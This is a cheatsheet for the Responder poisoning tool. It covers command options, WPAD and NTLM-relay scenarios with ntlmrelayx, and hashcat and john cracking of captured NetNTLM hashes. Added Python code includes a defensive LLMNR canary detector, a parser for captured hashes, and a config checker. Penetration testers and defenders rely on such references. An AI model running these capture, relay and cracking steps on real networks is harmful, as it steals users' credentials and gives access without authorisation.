Responder Cheatsheet
LLMNR, NBT-NS, and MDNS poisoner for capturing credentials.
Basic Syntax
```shell
sudo responder -I <interface> [options]
```
Core Options
| Option | Description |
|---|---|
| -I INTERFACE | Network interface (required) |
| -i IP | Local IP to use |
| -e IP | External IP for WPAD |
| -b | Return basic HTTP auth |
| -r | Enable answers for netbios wredir suffix queries |
| -d | Enable answers for netbios domain suffix queries |
| -w | Start WPAD rogue proxy server |
| -F | Force WPAD auth on wpad.dat file retrieval |
| -P | Force proxy auth (may cause a DoS) |
| -v | Verbose mode |
| -A | Analyze mode (no poisoning) |
Basic Usage
Start Responder
```shell
sudo responder -I eth0
```
With WPAD Proxy
```shell
sudo responder -I eth0 -wFP
```
Analyze Mode (Passive)
```shell
sudo responder -I eth0 -A
```
Force Basic Auth
```shell
sudo responder -I eth0 -b
```
Protocols Poisoned
| Protocol | Description |
|---|---|
| LLMNR | Link-Local Multicast Name Resolution |
| NBT-NS | NetBIOS Name Service |
| MDNS | Multicast DNS |
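All three protocols above are link-local name resolution that any host on the segment may answer, which is exactly what a poisoner abuses. The defensive counterpart is a canary probe: ask for a name that cannot exist and treat any answer as evidence of a poisoner. The following is an added example (not Responder's code or part of the original cheatsheet) that builds an LLMNR query, parses the DNS-style reply, and reports every host that answered; the transaction ID, canary name and reply bytes are constructed for the example.

```python
import os
import socket
import struct

# LLMNR (RFC 4795) rides on UDP 5355 to the 224.0.0.252 multicast group and
# reuses the DNS message layout, so a small DNS-style encoder/decoder is enough.
LLMNR_GROUP = ("224.0.0.252", 5355)
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """Encode a dotted name as DNS-style length-prefixed labels."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_llmnr_query(name: str, txid: int) -> bytes:
    """Standard A-record query: header (QDCOUNT=1) + one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def decode_name(data: bytes, offset: int):
    """Decode a name at offset (following compression pointers); return (name, next_offset)."""
    labels, end, jumped, hops = [], offset, False, 0
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:            # 2-byte compression pointer
            if not jumped:
                end = offset + 2
            jumped, hops = True, hops + 1
            if hops > 8:
                raise ValueError("compression pointer loop")
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii", "replace"))
        offset += length
    if not jumped:
        end = offset
    return ".".join(labels), end


def parse_llmnr_response(data: bytes, expected_txid: int):
    """Return [(name, ipv4), ...] from the answer section, or [] if this is not our response."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if txid != expected_txid or not (flags & 0x8000):   # wrong ID, or QR bit clear
        return []
    offset = 12
    for _ in range(qd):                                  # skip the echoed question(s)
        _, offset = decode_name(data, offset)
        offset += 4
    answers = []
    for _ in range(an):
        name, offset = decode_name(data, offset)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        if rtype == QTYPE_A and rclass == QCLASS_IN and rdlen == 4:
            answers.append((name, ".".join(str(b) for b in rdata)))
    return answers


def probe_llmnr(canary: str, timeout: float = 2.0):
    """Query a name that does not exist and collect every answerer.

    A clean segment returns nothing; each (source, name, ip) tuple is a poisoner.
    """
    txid = int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    hits = []
    try:
        sock.sendto(build_llmnr_query(canary, txid), LLMNR_GROUP)
        while True:
            data, (src, _port) = sock.recvfrom(512)
            for name, ip in parse_llmnr_response(data, txid):
                hits.append((src, name, ip))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


# Constructed sample exchange (not captured traffic): query for "canary-abc" with
# transaction ID 0x1234, and the kind of reply a poisoner sends back: QR set, one A
# record (name given as a compression pointer to offset 12) resolving to 10.10.10.99.
SAMPLE_QUERY = bytes.fromhex("123400000001000000000000" "0a63616e6172792d61626300" "00010001")
SAMPLE_RESPONSE = bytes.fromhex(
    "123480000001000100000000"                          # txid 0x1234, flags 0x8000, QD=1, AN=1
    "0a63616e6172792d61626300" "00010001"               # echoed question
    "c00c" "0001" "0001" "0000001e" "0004" "0a0a0a63"   # ptr->12, A, IN, TTL 30, 10.10.10.99
)

if __name__ == "__main__":
    print(parse_llmnr_response(SAMPLE_RESPONSE, 0x1234))   # [('canary-abc', '10.10.10.99')]
```

Run `probe_llmnr("some-random-name-" + os.urandom(4).hex())` from a scheduled job on each segment; a non-empty result is a high-confidence alert, since no legitimate host should claim a name that was just invented. The parser only accepts replies carrying the probe's own transaction ID, so unrelated multicast traffic is ignored.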
Servers Started
| Server | Purpose |
|---|---|
| HTTP | Capture HTTP auth |
| HTTPS | Capture HTTPS auth |
| SMB | Capture SMB auth (NTLMv1/v2) |
| LDAP | Capture LDAP auth |
| SQL | Capture MSSQL auth |
| FTP | Capture FTP credentials |
| POP3 | Capture POP3 credentials |
| IMAP | Capture IMAP credentials |
| SMTP | Capture SMTP credentials |
| DNS | Respond to DNS queries |
| Kerberos | Capture Kerberos auth |
| WPAD | Web Proxy Auto-Discovery |
| WinRM | Windows Remote Management |
| RDP | Remote Desktop Protocol |
| DCE-RPC | Capture RPC auth |
Configuration
Config File Location
`/etc/responder/Responder.conf` or `/usr/share/responder/Responder.conf`
Disable Specific Servers
Edit the config file:
```ini
[Responder Core]
SQL = Off
SMB = On
HTTP = On
HTTPS = On
```
Captured Hashes
Hash Location
/usr/share/responder/logs/
Hash Format (NTLMv2)
```
user::DOMAIN:challenge:response:blob
```
Crack with Hashcat
```shell
hashcat -m 5600 hashes.txt wordlist.txt
```
Crack with John
```shell
john --format=netntlmv2 hashes.txt --wordlist=wordlist.txt
```
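Responder's log files contain one `user::DOMAIN:challenge:response:blob` line per captured authentication, and the same account usually appears many times. Before cracking, or when writing up which accounts were exposed during an engagement, it helps to validate each line and keep one capture per account. The following is an added example, not part of the original cheatsheet or of Responder itself; it goes slightly beyond the text by also recognising the NTLMv1 line layout (`user::DOMAIN:LM response:NT response:challenge`, hashcat mode 5500). The sample log is constructed.

```python
import re
from dataclasses import dataclass

# One captured response per line.  Hex fields are case-insensitive.
#   NTLMv2: user::DOMAIN:server_challenge(16):NTProofStr(32):blob       -> hashcat -m 5600
#   NTLMv1: user::DOMAIN:LM_response(48):NT_response(48):challenge(16)  -> hashcat -m 5500
HEX = "[0-9A-Fa-f]"
NTLMV2_RE = re.compile(
    rf"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<challenge>{HEX}{{16}}):(?P<proof>{HEX}{{32}}):(?P<blob>{HEX}+)$")
NTLMV1_RE = re.compile(
    rf"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<lm>{HEX}{{48}}):(?P<nt>{HEX}{{48}}):(?P<challenge>{HEX}{{16}})$")


@dataclass(frozen=True)
class NetNtlmHash:
    version: int      # 1 or 2
    user: str
    domain: str
    challenge: str    # server challenge, lower-cased hex
    raw: str          # the original line, which hashcat/john consume unchanged

    @property
    def hashcat_mode(self) -> int:
        return 5600 if self.version == 2 else 5500

    @property
    def account(self) -> str:
        return f"{self.domain}\\{self.user}".lower()


def parse_line(line: str):
    """Return a NetNtlmHash for a well-formed Responder line, else None."""
    line = line.strip()
    m = NTLMV2_RE.match(line)
    if m:
        return NetNtlmHash(2, m["user"], m["domain"], m["challenge"].lower(), line)
    m = NTLMV1_RE.match(line)
    if m:
        return NetNtlmHash(1, m["user"], m["domain"], m["challenge"].lower(), line)
    return None


def parse_log(text: str):
    """Split a log file's text into (hashes, rejected_lines); blank lines are ignored."""
    hashes, rejected = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        parsed = parse_line(line)
        if parsed is None:
            rejected.append(line)
        else:
            hashes.append(parsed)
    return hashes, rejected


def one_per_account(hashes):
    """Keep the first capture per (account, version); a cracker needs only one."""
    seen, unique = set(), []
    for h in hashes:
        key = (h.account, h.version)
        if key not in seen:
            seen.add(key)
            unique.append(h)
    return unique


def exposed_accounts(hashes):
    """Sorted DOMAIN\\user list of accounts whose credentials were captured."""
    return sorted({h.account for h in hashes})


# Constructed sample log (not real captures).  Two NTLMv2 captures for alice, one for
# bob, one NTLMv1 capture for a service account, and one malformed line.
SAMPLE_LOG = """\
alice::CORP:1122334455667788:0123456789abcdef0123456789abcdef:0101000000000000aabbccddeeff0011
alice::CORP:8877665544332211:fedcba9876543210fedcba9876543210:0101000000000000ffeeddccbbaa0011
bob::CORP:0011223344556677:00112233445566778899aabbccddeeff:0101000000000000deadbeefdeadbeef
svc-backup::CORP:ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789:0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF:1122334455667788
not a hash line
"""

if __name__ == "__main__":
    hashes, rejected = parse_log(SAMPLE_LOG)
    for h in one_per_account(hashes):
        print(h.hashcat_mode, h.raw)
    print("rejected:", rejected)
    print("exposed:", exposed_accounts(hashes))
```

Rejected lines are worth inspecting rather than silently dropping: a line that fails both patterns is the usual reason for the "hash not cracking" symptom in the troubleshooting table, since hashcat rejects it or parses the fields wrongly.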
Attack Scenarios
Credential Capture
- Run Responder:

  ```shell
  sudo responder -I eth0
  ```

- Wait for a victim to mistype a share name or query a non-existent host
- Responder poisons the response
- Victim sends credentials to the attacker
- Capture the NTLMv1/v2 hash
WPAD Attack
- Run Responder with WPAD:

  ```shell
  sudo responder -I eth0 -wFP
  ```

- Victim's browser requests wpad.dat
- Responder forces authentication
- Capture credentials
Combine with NTLM Relay
Disable SMB/HTTP in Responder
Edit Responder.conf:
```ini
SMB = Off
HTTP = Off
```
Run Responder
```shell
sudo responder -I eth0
```
Run ntlmrelayx
```shell
impacket-ntlmrelayx -t smb://10.10.10.10 -smb2support
```
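Both the "Disable Specific Servers" section and the relay setup above come down to editing On/Off keys under `[Responder Core]`, and a stale edit is easy to miss when the file lives in one of two locations. The following is an added example (not part of Responder or of the original cheatsheet) that reads a Responder.conf text with the standard library's `configparser`, reports which servers are enabled, and flags any server that is still On but must be Off for the setup in use. The sample config excerpt is constructed; only the key names the cheatsheet itself uses are relied on.

```python
import configparser

# Constructed Responder.conf excerpt (not a real file).  Comments use ';' as in
# the shipped file; non-server keys such as Challenge are present and must be ignored.
SAMPLE_CONF = """\
[Responder Core]
; Servers to start
SQL = On
SMB = Off
HTTP = Off
HTTPS = On
LDAP = On
Challenge = Random
"""


def server_states(conf_text: str) -> dict:
    """Map each On/Off key in [Responder Core] to True (On) or False (Off)."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str            # keep key case as written (SMB, not smb)
    parser.read_string(conf_text)
    states = {}
    for key, value in parser["Responder Core"].items():
        v = value.strip().lower()
        if v in ("on", "off"):          # skips Challenge = Random and similar keys
            states[key] = (v == "on")
    return states


def enabled_servers(conf_text: str) -> list:
    """Sorted names of servers Responder will start with this config."""
    return sorted(k for k, on in server_states(conf_text).items() if on)


def still_on(conf_text: str, must_be_off=("SMB", "HTTP")) -> list:
    """Servers that must be Off (default: the two ntlmrelayx needs) but are On."""
    states = server_states(conf_text)
    return [k for k in must_be_off if states.get(k, False)]


if __name__ == "__main__":
    print("enabled:", enabled_servers(SAMPLE_CONF))   # ['HTTPS', 'LDAP', 'SQL']
    print("conflicts:", still_on(SAMPLE_CONF))        # []
```

To check the live file, pass `open("/etc/responder/Responder.conf").read()` (or the `/usr/share/responder` path) in place of `SAMPLE_CONF`; a non-empty `still_on()` result means the relay setup will compete with Responder's own listeners for those ports.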
Best Practices
- Run in analyze mode first (`-A`) to understand the traffic
- Be aware of potential network disruption
- Use with ntlmrelayx for relay attacks instead of just capturing
- Check whether SMB signing is disabled on targets
Troubleshooting
| Issue | Solution |
|---|---|
| Port 445 in use | Disable local SMB: `systemctl stop smbd` |
| No captures | Check interface and network segment |
| Hash not cracking | May need better wordlist or rules |